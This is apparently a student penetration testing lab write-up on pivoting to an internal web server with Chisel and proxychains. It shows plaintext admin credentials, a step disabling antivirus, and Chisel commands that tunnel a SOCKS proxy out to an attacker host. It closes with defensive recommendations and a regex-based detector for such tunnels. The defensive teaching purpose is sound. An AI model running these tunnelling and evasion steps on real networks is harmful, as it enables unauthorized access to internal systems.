Gary Jones

Chisel and Proxychains To Breach Internal Web Server


Pivoting to Access devbox.artstailor.com with Chisel and Proxychains


Situation:

This exercise aimed to demonstrate pivoting techniques to access an otherwise inaccessible internal web server, devbox.artstailor.com. By leveraging a Chisel SOCKS proxy and administrative credentials for costumes.artstailor.com, the goal was to perform an nmap scan, forward a local port, and assess the development status of Art’s web application.


Obstacles:

  1. Firewall Configuration: Required bypassing restrictions to communicate with internal systems.
  2. ICMP Blocking: The Chisel SOCKS5 proxy does not carry ICMP packets, so ping-based host discovery does not work through the tunnel and alternative host discovery methods are required.
  3. Port Detection: Narrowing down critical ports for identifying the operating system and services on the target.

Actions Taken:

  1. Initial Setup:
    • Logged into costumes.artstailor.com using provided administrative credentials (pr0b3admin:H4ck3rH4nkH1tsB4ck).
    • Shared the /temp folder to facilitate file transfers between Kali and the target system.
    • Disabled real-time virus protection to allow execution of Chisel and other tools.
  2. Chisel Configuration:
    • Started Chisel in server mode on Kali using the command:
      chisel server -p 1080 --socks5
    • Ran the Chisel client on costumes.artstailor.com to establish a SOCKS proxy connection:
      chisel.exe client kali.pr0b3.com:1080 socks
  3. nmap Scanning via Proxychains:
    • Updated proxychains4.conf to route traffic through the Chisel SOCKS5 proxy.
    • Conducted an nmap scan of devbox.artstailor.com, focusing on key ports:
      proxychains nmap -Pn -sV devbox.artstailor.com -p22,80
    • Identified ports 22 (SSH) and 80 (HTTP) as open, confirming the target is running Linux.
  4. Port Forwarding and Web Application Analysis:
    • Forwarded local port 8080 to devbox.artstailor.com:80 using Chisel.
    • Accessed the development web page through Kali’s browser to assess its functionality.

Results:

  1. Vulnerabilities Identified:
    • Open Ports: Port 22 (SSH) and port 80 (HTTP) were accessible through the proxy.
    • Weak Firewall Configuration: Allowed unrestricted proxy traffic to internal systems.
  2. Development Status:
    • The web application on port 80 loaded successfully, displaying an under-construction version of Art’s tailor management system.
    • Port 22 confirmed the presence of an SSH service, likely for development or administration purposes.
  3. Risk Level:
    • High: Misconfigurations and open ports expose sensitive development environments to potential exploitation.

Tool Purpose Overview:

Chisel:

  • A TCP/UDP tunneling tool used to create a SOCKS5 proxy for accessing internal systems behind a firewall.

Proxychains:

  • Routes traffic through a proxy, enabling tools like nmap to communicate with internal systems indirectly.

nmap:

  • Network scanning tool used to identify open ports, services, and operating systems on the target.

rdesktop:

  • Utilized for remote access to costumes.artstailor.com to manage Chisel and perform administrative tasks.

Recommendations:

  1. Restrict Proxy Access:
    • Limit SOCKS proxy usage to specific IPs and authenticated users only.
    • Monitor proxy activity for unusual patterns.
  2. Enhance Firewall Rules:
    • Close unnecessary ports like 22 and 80 if they are not required for external access.
    • Implement internal segmentation to isolate development systems.
  3. Secure Development Environments:
    • Require strong authentication for SSH access to development servers.
    • Periodically review open ports and services for unnecessary exposure.
  4. Routine Vulnerability Scanning:
    • Schedule regular scans to identify and mitigate misconfigurations promptly.
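
One way to act on the "monitor proxy activity" recommendation from the defender's side, as an added example that is not part of the original write-up: a small detector that flags SOCKS tunnel clients by their command-line arguments and escalates when real-time protection was disabled on the same host shortly before. The event layout, the 30-minute window and the sample events are assumptions constructed for illustration; event ID 1 is Sysmon process creation and 5001 is Microsoft Defender's "real-time protection disabled" event.

```python
import re
from datetime import datetime, timedelta

# Constructed sample events (not taken from the engagement).
# event_id 1    = Sysmon process creation
# event_id 5001 = Microsoft Defender real-time protection disabled
EVENTS = [
    {"ts": "2024-01-10T09:02:11", "host": "costumes", "event_id": 5001, "cmd": ""},
    {"ts": "2024-01-10T09:05:40", "host": "costumes", "event_id": 1,
     "cmd": r"C:\temp\chisel.exe client kali.pr0b3.com:1080 socks"},
    {"ts": "2024-01-10T10:00:00", "host": "hr-pc", "event_id": 1,
     "cmd": r"C:\Program Files\App\sync.exe client --config app.ini"},
    {"ts": "2024-01-10T11:15:00", "host": "costumes", "event_id": 1,
     "cmd": r"C:\Users\Public\svc.exe client 192.0.2.10:443 R:socks"},
]

# Match on arguments rather than the image name, so the rule does not depend
# on the file being called chisel.exe: "client <host>:<port> [R:]socks".
TUNNEL_CLIENT = re.compile(r"\bclient\s+\S+:\d{1,5}\s+(?:R:)?socks\b", re.I)
WINDOW = timedelta(minutes=30)  # assumed correlation window


def detect(events):
    """Return alerts for SOCKS tunnel clients; 'high' if AV was disabled shortly before."""
    av_off = {}  # host -> time of the most recent 5001 event
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if ev["event_id"] == 5001:
            av_off[ev["host"]] = ts
        elif ev["event_id"] == 1 and TUNNEL_CLIENT.search(ev["cmd"]):
            recent = ev["host"] in av_off and ts - av_off[ev["host"]] <= WINDOW
            alerts.append({
                "host": ev["host"],
                "ts": ev["ts"],
                "severity": "high" if recent else "medium",
                "cmd": ev["cmd"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["severity"], alert["host"], alert["ts"], alert["cmd"])
```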
